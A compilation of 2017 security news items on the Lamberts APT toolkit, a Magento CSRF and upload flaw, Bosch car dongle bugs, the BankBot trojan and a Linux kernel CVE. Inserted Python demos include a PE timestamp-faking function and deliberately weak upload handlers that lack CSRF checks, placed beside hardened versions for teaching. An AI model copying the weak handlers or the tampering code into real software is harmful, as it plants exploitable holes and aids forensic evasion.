White Lambert is a family of tools that share the same internal description as Black Lambert. Known tool types, builds, and version names include:
ToolType “aa”, protocol 3, version 7, versionName 5.0.2, build 113140
ToolType “aa”, protocol 3, version 7, versionName 5.0.0, build 113140
ToolType “aa”, protocol 3, version 6, versionName 4.2.0, build 110836M
ToolType “aa”, protocol 3, version 5, versionName 3.2.0
One of the White Lambert samples is interesting because it has a forgotten PDB path inside, which points to “Archan~1” and “Hudson”. Hudson could point to a project name, if the authors name their projects after US rivers, or it could be the developer’s first name. The truncated (8.3) path “archan~1” most likely means “Archangel”. The tool type “aa” could also suggest “ArchAngel”. By comparison, the Black Lambert tool type “wl” has no known meaning.
White Lambert samples run in kernel mode and sniff network traffic looking for special packets containing instructions to execute. To run unsigned code in kernel mode on 64-bit Windows, White Lambert uses an exploit against a signed, legitimate SiSoftware Sandra driver. The same method was used before by Turla, ProjectSauron, and Equation’s Grayfish, with other known, legitimate drivers.
Pink Lambert
Pink Lambert is a suite of tools initially discovered on a White Lambert victim. It includes a beaconing implant, partially based on publicly available source code. The source code on top of which Pink Lambert’s beaconing implant was created is “A Fully Featured Windows HTTP Wrapper in C++”.
Figure 6. “A Fully Featured Windows HTTP Wrapper” by shicheng
Other tools in the Pink Lambert suite include USB stealer modules and a very complex multi-platform orchestrator.
In a second incident, a Pink Lambert orchestrator was found on another White Lambert victim, substantiating the connection between the Pink and White Lamberts.
Gray Lambert
Gray Lambert is the most recent tool in the Lamberts’ arsenal. It is a network-driven backdoor, similar in functionality to White Lambert. Unlike White Lambert, which runs in kernel mode, Gray Lambert is a user-mode implant. The compilation and coding style of Gray Lambert is similar to the Pink Lambert USB stealers. Gray Lambert initially appeared on the computers of victims infected by White Lambert, which could suggest the authors were upgrading White Lambert infections to Gray. This migration activity was last observed in October 2016.
Some of the known filenames for Gray Lambert are mwapi32.dll and poolstr.dll – it should be pointed out, though, that the filenames used by the Lamberts are generally unique and have never been used twice.
Timeline
Most of the Blue and Green Lambert samples have two C&C servers hardcoded in their configuration block: a hostname and an IP address. Using our own pDNS as well as DomainTools IP history, we plotted the times when the C&C servers were active and pointing to the same IP address as the one from the configuration block.
Unfortunately, this method doesn’t work for all samples, since some of them don’t have a domain for C&C. Additionally, in some cases we couldn’t find any pDNS information for the hostname configured in the malware.
Luckily, the attackers made a few mistakes that allow us to identify the activity times for most of the other samples. For instance, in cases where no pDNS information was available for a subdomain of the main C&C domain, the domain registration dates were sufficient to indicate when the activity began. Additionally, in some cases the top domain pointed to the same IP address as the one in the configuration block, allowing us to identify the activity times.
Another worthwhile analysis method focuses on the set of Blue Lambert samples that have exports. Although most compilation timestamps in the PE header appear to have been tampered with (to reflect a 2003-2004 range), the authors forgot to alter the timestamp in the export section. This allowed us to identify not just the activity/compilation timestamps, but also the method used for faking the compilation timestamps in the PE header.
It seems the algorithm used to tamper with the samples was the following: subtract 0x10 from the highest byte of the timestamp (which amounts to about eight and a half years) and then randomize the lowest 3 bytes. From this we conclude that, for the Blue Lamberts, the original compilation time of the samples was in the range of 2012-2015.
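The transform just described can be reproduced and, more usefully for an analyst, checked for. The following Python is an added example, not Kaspersky's tooling: it reads IMAGE_FILE_HEADER.TimeDateStamp from a PE image, applies the subtract-0x10-from-the-top-byte transform, flags a header/export timestamp pair that fits it, and recovers the window in which the real timestamp must lie (the randomized low three bytes are lost, so only a window is recoverable). The sample timestamp and the minimal PE stub are constructed for the demonstration.

```python
# Added example (not Kaspersky's tooling): reproducing and detecting the PE timestamp
# tampering described in the text. The export directory's TimeDateStamp is left intact
# by the tampering, so a header/export pair can be tested against the transform.
import random
import struct
from datetime import datetime, timezone

TOP_BYTE_DELTA = 0x10                  # subtracted from the highest byte of the 32-bit timestamp
DELTA_SECONDS = TOP_BYTE_DELTA << 24   # 268435456 s, roughly eight and a half years


def tamper_timestamp(real_ts, rng=random):
    """Apply the described transform: top byte minus 0x10, lowest three bytes randomized."""
    high = ((real_ts >> 24) & 0xFF) - TOP_BYTE_DELTA
    if high < 0:
        raise ValueError("timestamp too small for this transform")
    return (high << 24) | rng.getrandbits(24)


def looks_tampered(header_ts, export_ts):
    """True when the header timestamp sits exactly 0x10 top-byte units behind the export timestamp."""
    return ((export_ts >> 24) & 0xFF) - ((header_ts >> 24) & 0xFF) == TOP_BYTE_DELTA


def recovery_window(header_ts):
    """Bounds on the original timestamp implied by a tampered header (low bytes are lost)."""
    high = ((header_ts >> 24) & 0xFF) + TOP_BYTE_DELTA
    return high << 24, (high << 24) | 0xFFFFFF


def to_utc(ts):
    return datetime.fromtimestamp(ts, tz=timezone.utc)


def coff_timestamp(pe_bytes):
    """Read IMAGE_FILE_HEADER.TimeDateStamp: MZ header, e_lfanew at 0x3C, then
    'PE\\0\\0', Machine (2 bytes), NumberOfSections (2 bytes), TimeDateStamp (4 bytes)."""
    if pe_bytes[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe_bytes, 0x3C)[0]
    if pe_bytes[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    return struct.unpack_from("<I", pe_bytes, e_lfanew + 8)[0]


def build_stub_pe(timestamp):
    """Constructed minimal image: a DOS header pointing at a COFF header carrying the timestamp."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = b"PE\0\0" + struct.pack("<HHI", 0x14C, 1, timestamp)  # IMAGE_FILE_MACHINE_I386, 1 section
    return bytes(dos) + coff


def analyze(pe_bytes, export_ts):
    """Compare the header timestamp with the (untampered) export directory timestamp."""
    header_ts = coff_timestamp(pe_bytes)
    result = {"header": to_utc(header_ts), "export": to_utc(export_ts),
              "tampered": looks_tampered(header_ts, export_ts)}
    if result["tampered"]:
        lo, hi = recovery_window(header_ts)
        result["window"] = (to_utc(lo), to_utc(hi))
    return result


# Constructed sample: a real build time of 2014-01-01 00:00:00 UTC surviving in the export table.
REAL_EXPORT_TS = 1388534400

if __name__ == "__main__":
    faked = tamper_timestamp(REAL_EXPORT_TS, random.Random(7))
    print(analyze(build_stub_pe(faked), REAL_EXPORT_TS))
```

With the constructed 2014 export timestamp, the faked header lands in 2005 whatever the random low bytes are, and the recovered window spans roughly half a year around the true build date; the check only fires when the top-byte difference is exactly 0x10, so it is specific to this tampering pattern rather than a general anomaly detector.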
Putting together all the various families, with recovered activity times, we come to the following picture:
Figure 8. A timeline of activity for known Lamberts
As can be seen from the chart above, Green Lambert is the oldest and longest-running member of the family, while Gray is the newest. White, Blue and Pink overlap somewhat in deployment, with Blue replacing Green Lambert. Black Lambert was seen only briefly and we assume it was “retired” from the arsenal after being discovered by FireEye in 2014.
Codenames and Popular Culture Referenced in Lamberts
The threat group(s) behind the Lambert toolkits have used a large number of codenames extensively throughout their projects. Some of these codenames are references to old computer games, Star Trek, and cartoons, which is very unusual for high profile APT groups. We really enjoyed going through the backstories of these codenames and wanted to provide them below for others to enjoy as well.
For instance, one of the Green Lambert versions has the internal codename “GORDON FLASH”, which can also be read as “FLASH GORDON”. Flash Gordon is the hero of a space opera adventure comic strip created by and originally drawn by Alex Raymond. It was first published in 1934 and subsequently turned into a popular film in 1980.
Flash Gordon poster
A ‘Funnel cake’ is a regional food popular in North America at carnivals, fairs, sporting events, and seaside resorts. This explains the codename “FUNNELCAKE CARNIVAL”:
Figure 9. A typical funnel cake
Spock and Prosper obviously refer to Star Trek, the well-known science fiction television series created by Gene Roddenberry. Cdr. Spock is a half-Vulcan, half-human character, portrayed by Leonard Nimoy. “Live long and prosper” is the traditional Vulcan greeting in the series.
Leonard Nimoy as “Spock” displaying the traditional Vulcan greeting “Live long and prosper”
Ringtoss is a game that is very popular at carnivals in North America.
DOUBLESIDED SCOOBYSNACK is likely a reference to an NFL Lip Reading video featuring Adrian Peterson that went viral in mid-2013. According to the urban dictionary, it is also used to denote a sexual game in which the participants are dressed as Scooby-Doo and his master.
Ape Escape (also known as Saru Get You (サルゲッチュ Saru Getchu) in Japan) is a series of video games made by SCE Japan Studio, starting with Ape Escape for PlayStation in 1999. The series often incorporates ape-related humor, unique gameplay, and a wide variety of pop culture references; it is also notable for being the first game to make the DualShock or Dual Analog controller mandatory.
Ape Escape
INVERTED SHOT is likely a reference to a mixed martial arts move also known as an ‘Imanari roll takedown’, named after Masakazu Imanari who popularized the grappling technique. It consists of a modified Brazilian jiu-jitsu granby roll that places the fighter in inverted guard position while taking the opponent down to the mat.
GAI and SHU (as used in Green Lambert OS X) are characters from the Guilty Crown anime series. Gai Tsutsugami (恙神 涯 Tsutsugami Gai) is the 17-year-old resourceful and charismatic leader of the “Funeral Parlor” resistance group, while Shu Ouma (桜満 集 Ōma Shū) is the 17-year-old main protagonist of Guilty Crown.
Figure 10. Main characters of Guilty Crown with Shu Ouma in the middle.
Conclusions
The Lamberts toolkit spans across several years, with most activity occurring in 2013 and 2014. Overall, the toolkit includes highly sophisticated malware, which relies on high-level techniques to sniff network traffic, run plugins in memory without touching the disk, and leverages exploits against signed drivers to run unsigned code on 64-bit Windows.
To further exemplify the proficiency of the attackers leveraging the Lamberts toolkit, deployment of Black Lambert included a rather sophisticated TTF zero day exploit, CVE-2014-4148. Taking that into account, we classify the Lamberts as the same level of complexity as Regin, ProjectSauron, Equation and Duqu2, which makes them one of the most sophisticated cyber espionage toolkits we have ever analysed.
Considering the complexity of these projects and the existence of an implant for OS X, we assume that it is highly possible that other Lamberts also exist for other platforms, such as Linux. The fact that in the vast majority of cases the infection method is unknown probably means there are still a lot of unknown details about these attacks and the group(s) leveraging them.
As usual, defense against attacks such as those from the Lamberts/Longhorn should include a multi-layered approach. Kaspersky products include special mitigation strategies against the malware used by this group, as well as the many other APT groups we track. If you are interested in reading more about effective mitigation strategies in general, we recommend the following articles:
Strategies for mitigating APTs
How to mitigate 85% of threats with four strategies
We will continue tracking the Lamberts and sharing new findings with our intel report subscribers, as well as with the general public. If you would like to be the first to hear our news, we suggest you subscribe to our intel reports.
Kaspersky Lab products successfully detect and eradicate all the known malware from the Lamberts family.
Unpatched Magento Flaw Exposes Online Stores to Attacks
14.4.2017 securityweek Vulnerability
Magento, the popular e-commerce platform used by more than 250,000 merchants worldwide, is affected by a potentially serious vulnerability that can be exploited to hijack online stores, researchers warned.
The flaw was found by DefenseCode in November and reported to Magento via the company’s Bugcrowd-based bug bounty program. The vendor indicated at the time that it had been aware of the issue, but it still hasn’t addressed it. After its attempts to obtain a status update on the vulnerability failed, DefenseCode decided to make its findings public.
The vulnerability is related to a feature that allows users to add Vimeo video content for an existing product. When a video is added, Magento automatically retrieves a preview image via a POST request.
This request method can be changed from POST to GET, allowing an attacker to launch a cross-site request forgery (CSRF) attack and upload an arbitrary file. While invalid image files are not allowed, the file is still saved on the server before it is validated.
The location of the file can be easily determined, enabling a hacker to upload a malicious PHP script to the server. In order to achieve remote code execution, the attacker also needs to upload a .htaccess file to the same directory.
For the attack to work, a hacker needs to convince a user with access to the shop’s administration panel, regardless of their role and permissions, to access a specially crafted web page that triggers the CSRF attack.
Researchers warned that successful exploitation of the vulnerability can allow an attacker to take complete control of a targeted system, including gaining access to sensitive customer information stored in the compromised store’s database.
“Full administrative access is not required to exploit this vulnerability as any Magento administrative panel user regardless of assigned roles and permissions can access the remote image retrieval functionality. Therefore, gaining a low privileged access can enable the attacker to compromise the whole system or at very least, the database (e.g. traversing to /app/etc/env.php to grab the database password),” DefenseCode wrote in its advisory.
The latest security updates were released by Magento developers in February, when they addressed a critical remote code execution vulnerability that allegedly affected only a few systems.
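The two defects DefenseCode describes, a state-changing action reachable over GET without an anti-CSRF token, and a fetched file written to a predictable path before it is validated, form a general pattern. The following Python is an added example and not Magento's code: a deliberately weak "retrieve remote preview image" handler beside a hardened one that insists on POST, verifies a per-session token, validates the fetched bytes before anything touches disk, and stores the result under an unpredictable name with a fixed extension. The Request class, the remote fetch and the fixture URLs are constructed stand-ins, and form_key is simply the name chosen here for the token parameter.

```python
# Added example (not Magento's code): a weak "retrieve remote preview image" handler beside a
# hardened one. Request, fetch_remote and the fixtures are constructed stand-ins.
import hmac
import os
import secrets
import tempfile
from dataclasses import dataclass, field


@dataclass
class Request:
    method: str
    params: dict
    session: dict                      # server-side session of the logged-in admin user
    headers: dict = field(default_factory=dict)


class UploadError(Exception):
    pass


PNG_MAGIC = b"\x89PNG\r\n\x1a\n"

# Constructed "remote" content keyed by URL; a real handler would fetch these over HTTP.
URL_IMAGE = "https://example.invalid/preview.png"
URL_NOT_IMAGE = "https://example.invalid/notimage.php"
REMOTE_FIXTURES = {
    URL_IMAGE: PNG_MAGIC + b"\x00" * 16,
    URL_NOT_IMAGE: b"<?php /* not an image */ ?>",
}


def fetch_remote(url):
    return REMOTE_FIXTURES[url]


def weak_preview_handler(req, storage_dir):
    """Weak pattern: any method accepted, no anti-CSRF token, file written before validation."""
    body = fetch_remote(req.params["remote_image"])
    path = os.path.join(storage_dir, os.path.basename(req.params["remote_image"]))  # predictable
    with open(path, "wb") as fh:
        fh.write(body)                     # persisted first ...
    if not body.startswith(PNG_MAGIC):
        raise UploadError("not an image")  # ... rejected second, but the file is still on disk
    return path


def hardened_preview_handler(req, storage_dir):
    """Hardened pattern: POST only, per-session token, validate before write, unpredictable name."""
    if req.method != "POST":
        raise UploadError("state-changing request must use POST")
    token = req.params.get("form_key", "")
    expected = req.session.get("form_key", "")
    if not token or not hmac.compare_digest(token, expected):
        raise UploadError("anti-CSRF token missing or invalid")
    body = fetch_remote(req.params["remote_image"])
    if not body.startswith(PNG_MAGIC):
        raise UploadError("not an image")  # nothing has been written at this point
    path = os.path.join(storage_dir, secrets.token_hex(16) + ".png")
    with open(path, "wb") as fh:
        fh.write(body)
    return path


def _rejects(handler, req, storage_dir):
    try:
        handler(req, storage_dir)
    except UploadError:
        return True
    return False


def demo():
    """Run both handlers against forged and legitimate requests; return what happened."""
    session = {"form_key": secrets.token_hex(8)}
    out = {}
    with tempfile.TemporaryDirectory() as d:
        forged_get = Request("GET", {"remote_image": URL_NOT_IMAGE}, session)
        out["weak_rejected"] = _rejects(weak_preview_handler, forged_get, d)
        out["weak_leaves_file"] = os.path.exists(os.path.join(d, "notimage.php"))
    with tempfile.TemporaryDirectory() as d:
        forged_get = Request("GET", {"remote_image": URL_NOT_IMAGE}, session)
        bad_token = Request("POST", {"remote_image": URL_NOT_IMAGE, "form_key": "wrong"}, session)
        bad_file = Request("POST", {"remote_image": URL_NOT_IMAGE,
                                    "form_key": session["form_key"]}, session)
        good = Request("POST", {"remote_image": URL_IMAGE, "form_key": session["form_key"]}, session)
        out["hardened_rejects_get"] = _rejects(hardened_preview_handler, forged_get, d)
        out["hardened_rejects_bad_token"] = _rejects(hardened_preview_handler, bad_token, d)
        out["hardened_rejects_non_image"] = _rejects(hardened_preview_handler, bad_file, d)
        out["hardened_leaves_no_file"] = os.listdir(d) == []
        saved = hardened_preview_handler(good, d)
        out["hardened_saves_image"] = os.path.isfile(saved) and saved.endswith(".png")
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The point the demo makes is the ordering: the weak handler does reject the non-image, exactly as the advisory says Magento did, yet the rejected file is still on disk at a guessable path afterwards, whereas the hardened handler never writes until every check has passed.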
Flaws in Bosch Car Dongle Allow Hackers to Stop Engine
14.4.2017 securityweek Vulnerability
Vulnerabilities found by researchers in Bosch’s Drivelog Connect product can be exploited by hackers to inject malicious messages into a vehicle’s CAN bus. The vendor has implemented some fixes and is working on adding more attack protections.
Bosch’s Drivelog Connect is a service that provides information about the condition of a vehicle, including potential defects, service deadlines, and data on fuel consumption and driving behavior. The product includes a dongle called Drivelog Connector, which is connected to the car’s OBD2 diagnostics interface, and a mobile application that communicates with the dongle via Bluetooth.
Researchers at automotive cybersecurity firm Argus have identified some potentially serious vulnerabilities in the communications between the mobile app and the dongle.
Vulnerabilities in Bosch’s Drivelog Connect
One of the security holes is related to the authentication process between the Drivelog Connector and the Drivelog Connect smartphone app. The app is available for both iOS and Android, but experts focused on the Android application. The second flaw affects the dongle’s message filter.
According to researchers, diagnostic messages can only be sent to the CAN bus using a valid service ID. However, this message filter can be bypassed by sending OEM-specific messages that can be obtained through CAN traffic monitoring or by fuzzing CAN bus messages.
An attack leveraging this message filter bypass can be launched by a hacker who has obtained root access to the targeted user’s smartphone. During the tests they conducted, Argus researchers said they managed to remotely stop the engine of a moving car by exploiting the vulnerability. They pointed out that, depending on the make and model of the car, other actions may have been possible.
This attack scenario requires root access to the Android device and a malicious patch to the mobile app. Car manufacturers have often pointed out that it’s difficult to prevent attacks once a smartphone has been compromised.
However, Argus researchers have found a way to launch attacks without this requirement. An information disclosure vulnerability in the authentication process between the app and the dongle allows an attacker to connect to a targeted device without hacking the phone first.
During the authentication process, the dongle sends any connecting Android device various pieces of information that can be used to obtain the user-supplied authorization PIN. The PIN can be brute-forced offline – the attack takes up to 30 minutes on a modern laptop – and it can then be used to connect to the dongle.
Once the connection has been completed, the attacker can send malicious CAN bus messages from their own device, instead of having to hijack the targeted user’s smartphone. This attack is mitigated by the fact that the hacker needs to be in Bluetooth range of the targeted vehicle.
In an advisory it published this week, Bosch said it addressed the authentication vulnerability on the server side by introducing two-step verification when additional users are registered to a device. The company is also working on a firmware update for the dongle to prevent attackers from sending unauthorized CAN messages from a hijacked mobile app.
Android Trojan Targeting Over 420 Banking Apps Worldwide Found On Google Play Store
14.4.2017 thehackernews Android
Do you like watching funny videos online?
I am not kind of a funny person, but I love watching funny videos clips online, and this is one of the best things that people can do in their spare time.
But, beware if you have installed a funny video app from Google Play Store.
A security researcher has discovered a new variant of the infamous Android banking Trojan hiding in apps under different names, such as Funny Videos 2017, on Google Play Store.
Niels Croese, a security researcher at the firm Securify B.V., analyzed the Funny Videos app, which has 1,000 to 5,000 installs, and found that the app acts like any of the regular video applications on Play Store, but in the background it targets customers of banks around the world.
This newly discovered banking Trojan works like any other banking malware, but two things make it different from others: its capability to target victims and its use of the DexProtector tool to obfuscate the app's code.
Dubbed BankBot, the banking trojan targets customers of more than 420 banks around the world, including Citibank, ING, and some new Dutch banks, like ABN, Rabobank, ASN, Regiobank, and Binck, among many others.
How Android Banking Trojan Works
In a nutshell, BankBot is mobile banking malware that looks like a simple app and once installed, allows users to watch funny videos, but in the background, the app can intercept SMS and display overlays to steal banking information.
Mobile banking trojans often disguise themselves as plugin apps, like Flash, or as adult content apps, but this app made its way onto Google Play Store by disguising itself as any other regular Android app.
Google has removed this malicious app from its Play Store after receiving the report from the researcher, but this does not mean that more such apps do not exist there with different names.
"Another problem is that Google [Play Store] mainly relies on automated scanning without a full understanding of the current obfuscation vectors resulting in banking malware on the Google Play Store." researcher told The Hacker News.
Once downloaded, the app persistently requests administrative rights, and if granted, the banking malware can control everything that's happening on an infected smartphone.
BankBot springs into action when the victim opens any of the mobile apps from a pre-configured list of 425 banking apps. A complete list of banks this BankBot variant is currently imitating can be found in the blog post published by the researcher.
Once one of the listed apps is opened, BankBot immediately displays an overlay, a page on top of the legitimate mobile banking app, and tricks Android users into entering their banking credentials into the overlay, just like a phishing attack.
This not only sends your banking credentials to your bank’s servers but also sends them to the server controlled by the fraudsters.
This social engineering technique is often used by financially motivated criminals to deceive users into giving up their personal details and sensitive banking information to fraudsters.
How to protect yourself?
There are standard protection measures you need to follow to remain unaffected:
Install a good antivirus app that can detect and block such malware before it can infect your device. Always keep the app up-to-date.
Always stick to trusted sources, like Google Play Store and the Apple App Store, and verify app permissions before installing apps. If any app is asking for more than what it is meant for, just do not install it.
Do not download apps from third-party sources. Although in this case the app was distributed through the official Play Store, most often such malware is distributed via untrusted third-party app stores.
Avoid unknown and unsecured Wi-Fi hotspots and keep your Wi-Fi turned OFF when not in use.
Be careful which apps you give administrative rights to. Admin rights are powerful and can give an app full control of your device.
Never click on links in SMS or MMS sent to your mobile phone. Even if the message looks legitimate, go directly to the website of origin and verify any possible updates.
Here's How Hacker Activated All Dallas Emergency Sirens On Friday Night
14.4.2017 thehackernews Incident
Last weekend when outdoor emergency sirens in Dallas cried loudly for over 90 minutes, many researchers concluded that some hackers hijacked the alarm system by exploiting an issue in a vulnerable computer network.
But it turns out that the hackers did not breach Dallas' emergency services computer systems to trigger the city's outdoor sirens for tornado warnings and other emergencies, rather they did it entirely on radio.
According to a statement issued on Monday, Dallas City Manager T.C. Broadnax clarified the cause of the last Friday's chaos, saying the "hack" used a radio signal that spoofed the system used to control the siren network centrally.
"I don't want someone to understand how it was done so that they could try to do it again," Broadnax said without going much into details. "It was not a system software issue; it was a radio issue."
First installed in 2007, the Dallas outdoor emergency warning system powers 156 sirens made by a company called Federal Signal.
The city officials did not provide details on how the Emergency Alert System (EAS) works, but noted that "it's a tonal-type system" that's usually controlled by tone combinations used by the EAS broadcast over the National Weather Service's weather radio, and by Dual-Tone Multi-Frequency (DTMF) or Audio Frequency Shift Keying (AFSK) encoded commands from a command center terminal sent over an emergency radio frequency.
The Federal Communications Commission (FCC) currently has the 700MHz range of radio frequency reserved for US public safety.
This suggests that the emergency system could be compromised by outside radio equipment replicating the tonal code required to trigger the alarms — which, in other words, is known as a "radio replay" attack.
It is believed that the hacker who managed to trigger the alarms last Friday somehow gained access to the siren system documentation, learned the exact tonal commands that trigger an alarm, and then just played that command signal repeatedly.
According to the city officials, the decade-old radio-based system was disabled hours after the breach and went live over the weekend with encryption to protect the language of tones as a measure to prevent such attacks.
The Dallas City Council has also voted to pay $100,000 more to its emergency siren system contractor to increase the security of the city's current system.
CVE-2016-10229 Linux remote code execution flaw potentially exposes systems at risk of hack
14.4.2017 securityaffairs Vulnerability
The Linux remote vulnerability tracked as CVE-2016-10229 puts Linux systems at risk of being hacked if not patched.
A Linux kernel vulnerability, tracked as CVE-2016-10229, potentially allows attackers to remotely take over a vulnerable system (i.e. servers, desktops, IoT devices and mobile devices).
“udp.c in the Linux kernel before 4.5 allows remote attackers to execute arbitrary code via UDP traffic that triggers an unsafe second checksum calculation during execution of a recv system call with the MSG_PEEK flag.” reads the description of the flaw published by the NVD.
According to the experts, the CVE-2016-10229 flaw exposes systems to attacks via UDP traffic: an attacker could potentially compromise a system running software that receives data through the recv() system call with the MSG_PEEK flag set. The attacker would send the target specially crafted packets that trigger the CVE-2016-10229 flaw by forcing a second checksum operation on the incoming data, and could thereby execute malicious code within the kernel with root privileges. Fortunately, the issue is hard to exploit, as explained by the popular Google Project Zero hacker Tavis Ormandy.
Dan Rosenberg @djrbliss: I have reviewed the relevant code and I mostly understand it, but I'm missing the security ramifications.
Tavis Ormandy @taviso: @djrbliss I'm as confused as you are...
7:18 PM - 13 Apr 2017
Common software, like the Nginx web server, sets the MSG_PEEK flag on some connections, potentially exposing the system to the attack.
The bug can also be potentially exploited by a local attacker to escalate privileges.
The vulnerability was discovered by Google engineer Eric Dumazet, who explained that the issue dates back to the end of 2015, when a small fix was applied to the Linux kernel.
Kernel versions below 4.5, all the way down to 2.6, are likely at risk; major Linux distributions such as Ubuntu and Debian were distributing fixed builds of the kernel by February this year.
According to Red Hat, its Linux distribution was never affected by the CVE-2016-10229 flaw.
Google has already rolled out security patches for Android that also fixed the CVE-2016-10229 in mobile devices.
“So, in short, yes, there is a remote kernel-level code execution vulnerability in Linux, which sounds like the worst of the very worst, but it is pretty much patched by now – and it appears to be tricky to exploit. It was silently addressed in the kernel source over a year ago, and fixed in updates to machines earlier this year, but only now has it come to wider attention.” reported The Register.
Hundreds of thousands of Magento e-shops are exposed to hacking due to an unpatched flaw
14.4.2017 securityaffairs Vulnerebility
An unpatched vulnerability in the Magento platform could be exploited by hackers to fully compromise the web servers that host the e-commerce sites.
An unpatched vulnerability in the Magento e-commerce platform could be exploited by attackers to upload and execute malicious PHP scripts on web servers that host online shops.
The vulnerability was reported by experts at the security firm DefenseCode; the issue resides in a feature that retrieves preview images for Vimeo videos, implemented to allow Magento admins to add videos to product listings.
The experts noticed that if the image URL references a different file, such as a PHP script, Magento will download the file to validate it. If the file is not an image, Magento will display the message “Disallowed file type”, leaving it on the server.
An attacker triggering the vulnerability could remotely execute code by first tricking Magento into downloading an .htaccess configuration file that enables PHP execution inside the download directory, and then downloading a malicious PHP script that can work as a backdoor.
At this point the backdoor can be accessed via the browser; the experts explained that the attacker can use the script to browse the server directories and read the database password from Magento’s configuration file.
The vulnerability could be exploited only by an authenticated attacker, even if it is a lower-privileged user.
The experts added that if the Magento e-shop doesn’t have the “Add Secret Key to URLs” option turned on, the attacker can launch a cross-site request forgery (CSRF) attack, forcing a user’s browser to perform an unauthorized request on the shop while the user is visiting a different website.
The attacker can hack the Magento shop by tricking victims into clicking on a link shared by email or by visiting a specially crafted web page.
The attack works against all users who have active Magento sessions in their browser; by exploiting this attack vector, hackers might take over users’ accounts.
“By changing the request method from POST to GET, a lack of a form_key parameter which serves as a CSRF token will be ignored and thus enable cross-site request forgery (CSRF) attacks.” reads the advisory published by DefenseCode.
“The attack can be constructed as simple as “
DefenseCode reported these issues to the Magento development team in November, but the flaws are still unpatched and almost all Magento CE versions are affected.
Below is the disclosure timeline:
11/18/2016 Vendor contacted via BugCrowd platform
11/18/2016 Vendor responded – aware of issue
04/11/2017 Vendor contacted again without response
04/13/2017 Advisory released to the public
In order to mitigate the attack, experts suggest enforcing the use of the ‘Add Secret Key to URLs’ option.
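Added example, not DefenseCode's or Magento's code: a Python sketch modeled on the two weaknesses described above. It places a form_key check that only runs for POST beside one that is method-independent, and a preview-image fetch that writes to disk before validating (leaving a non-image under its remote name) beside one that validates in memory and chooses its own file name. Function names, the magic-byte image check and the placeholder file contents are assumptions, not Magento internals.

```python
import hmac
import os
import secrets
import tempfile

# ---------- 1. CSRF token (form_key) enforcement ----------

def vulnerable_form_key_check(method: str, params: dict, session_form_key: str) -> bool:
    """Modeled on the advisory: the token is validated for POST only, so the same action
    requested via GET is accepted although no form_key is present at all."""
    if method == "POST":
        return hmac.compare_digest(params.get("form_key", ""), session_form_key)
    return True  # GET: a missing form_key is simply ignored


def hardened_form_key_check(method: str, params: dict, session_form_key: str) -> bool:
    """State-changing actions must use POST and carry a token matching the session."""
    if method != "POST":
        return False
    token = params.get("form_key")
    return token is not None and hmac.compare_digest(token, session_form_key)


# ---------- 2. Remote preview-image fetch ----------

_IMAGE_MAGIC = (b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff", b"GIF87a", b"GIF89a")


def looks_like_image(body: bytes) -> bool:
    return body.startswith(_IMAGE_MAGIC)  # startswith accepts a tuple of prefixes


def vulnerable_store_preview(download_dir: str, remote_name: str, body: bytes) -> str:
    """Write first, validate afterwards, and keep the remotely named file on failure."""
    path = os.path.join(download_dir, remote_name)
    with open(path, "wb") as fh:
        fh.write(body)
    if not looks_like_image(body):
        return "Disallowed file type"  # message shown to the admin, file left behind
    return "ok"


def hardened_store_preview(download_dir: str, body: bytes) -> str:
    """Validate in memory before touching disk; the server picks name and extension.
    Defense in depth (not shown): keep download_dir outside the web root."""
    if not looks_like_image(body):
        return "Disallowed file type"
    if body.startswith(_IMAGE_MAGIC[0]):
        ext = ".png"
    elif body.startswith(_IMAGE_MAGIC[1]):
        ext = ".jpg"
    else:
        ext = ".gif"
    path = os.path.join(download_dir, secrets.token_hex(8) + ext)
    with open(path, "wb") as fh:
        fh.write(body)
    return "ok"


def demo() -> dict:
    session_key = secrets.token_urlsafe(16)
    # A cross-site request arrives as a GET carrying no form_key (constructed parameters).
    cross_site = {"product_id": "42", "video_url": "https://example.invalid/preview"}
    out = {
        "vuln_accepts_get_without_token": vulnerable_form_key_check("GET", cross_site, session_key),
        "hardened_rejects_get_without_token": not hardened_form_key_check("GET", cross_site, session_key),
        "hardened_accepts_valid_post": hardened_form_key_check(
            "POST", {**cross_site, "form_key": session_key}, session_key),
    }
    not_an_image = b"not-an-image-placeholder"  # constructed stand-in for a non-image download
    with tempfile.TemporaryDirectory() as d:
        vulnerable_store_preview(d, "preview.php", not_an_image)
        out["vuln_leaves_file"] = os.path.exists(os.path.join(d, "preview.php"))
    with tempfile.TemporaryDirectory() as d:
        out["hardened_rejects"] = hardened_store_preview(d, not_an_image) == "Disallowed file type"
        out["hardened_leaves_nothing"] = os.listdir(d) == []
        hardened_store_preview(d, _IMAGE_MAGIC[0] + b"\x00" * 16)  # constructed PNG header
        names = os.listdir(d)
        out["hardened_stores_png"] = len(names) == 1 and names[0].endswith(".png")
    return out
```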
Targeted Malware Inflated With Junk Data to Avoid Detection
13.4.2017 securityweek Virus
A piece of malware used in targeted attacks aimed at South Korea and Japan is inflated with junk data in an effort to avoid detection. While the technique is not exactly new, researchers at Kaspersky Lab believe this particular malware is noteworthy.
The security firm came across the malware while analyzing attacks involving a malware toolkit dubbed “XXMM.” The threat, disguised as a file named srvhost.exe in an effort to avoid raising suspicion, had a size of more than 100 Mb.
Kaspersky’s investigation has revealed that the malware is a Trojan loader designed to activate a backdoor called “wali” by its author. The backdoor module is injected into the iexplore.exe process by the loader.
The size of malware samples typically ranges between a few kilobytes and a few megabytes, depending on how they are packaged. Cybercriminals have also been known to hide malware in movie or ISO files, which can result in malware that has a size of hundreds of megabytes or even a few gigabytes.
What makes Wali interesting is the fact that it’s not delivered as a 100 Mb file. The initial loader is roughly 1 Mb in size, but its two dropper components append tens of megabytes of garbage data to the final malware executable file.
Since the junk data is created dynamically by the droppers, the size of the malware file can vary. Kaspersky has seen both 50 Mb and 100 Mb samples in real world attacks, but experts have also observed a 200 Mb sample generated using the same technique.
Researchers believe this is also a noteworthy threat due to the fact that it has been used in targeted attacks.
“While this technique may seem inefficient in its primitive approach to bypass detection, we believe that in certain cases this malware may stay below the radar of incident responders and forensic analysts who use YARA rules to scan hard drives,” explained Kaspersky’s Suguru Ishimaru.
